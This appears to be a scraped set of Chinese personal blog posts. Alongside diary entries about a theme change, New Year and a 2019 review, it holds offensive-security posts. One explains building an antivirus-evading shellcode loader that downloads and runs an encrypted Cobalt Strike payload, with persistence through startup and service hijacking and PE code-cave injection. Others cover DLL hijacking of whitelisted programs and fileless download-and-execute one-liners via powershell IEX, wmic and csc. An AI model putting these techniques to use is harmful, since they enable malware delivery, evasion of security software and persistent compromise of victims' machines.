换了个主题

换了个主题,之前那个实在太破了。
不知道用啥,看朋友都在用VOID,然后自己另外一个站也在用VOID,按寻思就也换成了VOID了。
之前那款主题,可以说是从建站用到现在吧,经历了我的各种魔改,依旧没拥有花里胡哨的功能。
不过那种过时的风格也该退役了吧。
没了也好,就这样了。
可以光明正大的放萌豚图了,yeah

Tags: 日常

新年快乐

新的一年多多关照啦!
打算换个主题。有什么萌豚主题推荐嘛

Tags: 新年

打造一款socket型免杀无弹窗的shellcode

自己写马子太痛苦了。
然后发现了,cs,msf这些工具又很香。只是碍于这些东西。
没办法,重!启!上!线!
免杀什么的其实都是小意思。主要还是重启上线等一堆功能。
所以就打算在这里记录一下,从零开始的,打造一款无弹窗免杀的shellcode吧。
为了不吊大家胃口,我就直接写出原理吧。
其实也不难。

就是一个写一个shellcode带有socket+rc4加密跑远端加密后的cs的payload下载下来后执行。然后利用启动项劫持技术,绕过杀软的启动保护。

再高级一点的话,就是把启动项劫持,改成用masm编写超迷你型的shellcode装载器,然后插入目标的PE空隙中,然后修改OEP指向我们的空隙然后执行完shellcode后再跳转到入口点。

启动项劫持的原理就是,360虽然禁止对启动项进行增改,但是删和查是可以的,并且对于启动项/服务项中的目标程序并没有进行保护。所以我们可以对启动项的程序进行劫持替换修改都是没问题的。或者不对启动项劫持进行替换,而是找到一个运行中的服务,kill掉它的进程,然后对服务源程序进行劫持也是可以的。原理都差不多。

总之就是这样,考完了应该会去研究一波。

至于payload,有两个方案。

可以自己写,难度有点高,可以参考

二进制入门-打造Linux shellcode基础篇

但是这种东西,一般顶天给你整个下载者。和cs那种全部功能纯shellcode还是不一样的。你下载者最终还是需要下载的你的二进制文件,达不到“负载无文件”(不是纯无文件,毕竟你的shellcode还是需要的),可能会导致你的马子被检测到。

payload难主要难在,对于API地址的定位,不过一般只要找到LoadLibrary的地址,其实还算是好说的啦。
还有难就难在栈平衡这些。
下次研究一波。
实在不行,直接整个PELOADER,自建一个RVA导入,不过传输EXE的话可能会被杀软拦截emmm,但是都能传shellcode了,传个加密的PE到内存理论上也是没关系的吧,

所以还是推荐直接使用cs或者msf,简单粗暴。

最后研究出的地址在这里

shellcode-9bie

带有直接运行和服务启动效果。
怎么用我懒得说了,只能说不添加 启动的话,能无弹窗过360+主防吧。
目前发现还不能过诺顿,待我研究一波。

同时吐槽一下遇到的一些坑。

c++的string,是非常的香的。不需要free(char );(char)malloc();这种操作的。
但是,还是碍于X问题,0会被截断。
千万不要使用str开头的函数来处理std::string.c_str()的东西。str开头的函数遇到0会自动截断,被这东西坑了好久= =
建议使用mem开头的,而且带_s,指定长度,合理控制内存。

Tags: 免杀

2019 年度总结

回首2019 1/1,仿佛就在昨日一般。
感觉时光飞逝。
看了看博客的日志,我才发现,“卧槽?原来这是今年的事情了吗?我还以为这是去年或者前年的了”
总体来说,2019,算是 技术飞跃的一年
2019大事记

  • 博客改用https
  • 开始使用github
  • golang/c/cpp 水平指数级提高
  • 日zh*n水平指数级提高
  • 写出第一首完整的曲子
  • 乐理 ++
  • 专业水平(竹笛)++
  • ero后端填坑完毕,初步步入正轨

以上就是2019干的一些小事情啦。
当然还有很多是没有达到预期的。
比如说

  • ML(高数是真的学不来
  • ERO还是没整活
  • 钢琴水平提升并不高

总体来说,2019就这么过去了。
感觉上一个念头还在想着,成年了该咋样呢,结果成年了,世界也并没有什么改变,不如说一晃眼 ,都成年两年了。
再过几个月,我也是要步入2字头的人了啊,哎

感觉自己还是很菜,越学越菜,但是我越想学。

感觉自己文笔变差了。是不中二了吗?感觉没之前写的好了,

既然这样,那就先这样吧。

Tags: 随笔

DLL劫持的白利用加载

学到了一个新的技巧。
和lpk.dll类似,有些文件会自动加载目录下面的dll。
并且这些文件是经过授权且加入白名单的程序。
例如WINWORD.exe。
其他的待收集,只是记录一下

Tags: 渗透

浅谈windows下的白文件利用

最基础的就是windows自带服务
例如RDP。telnet。等等
之后再比如powershell:

powershell.exe -nop -whidden -c IEX ((new-objectnet.webclient).downloadstring('http://x.x.x.x:81/aa'))

wmic.exe:

cmd/c wmic os get /format:"\\x.x.x.x\1.xsl"&start/wait notepad

csc.exe:

"C:/Windows/Microsoft.NET/Framework64/v2.0.50727/csc.exe" /noconfig /fullpaths @"C:/Users/a/AppData/Local/Temp/l1xso2zu.cmdline"

等无落地方式执行

Tags: none
文章总数:200篇 分类总数:4个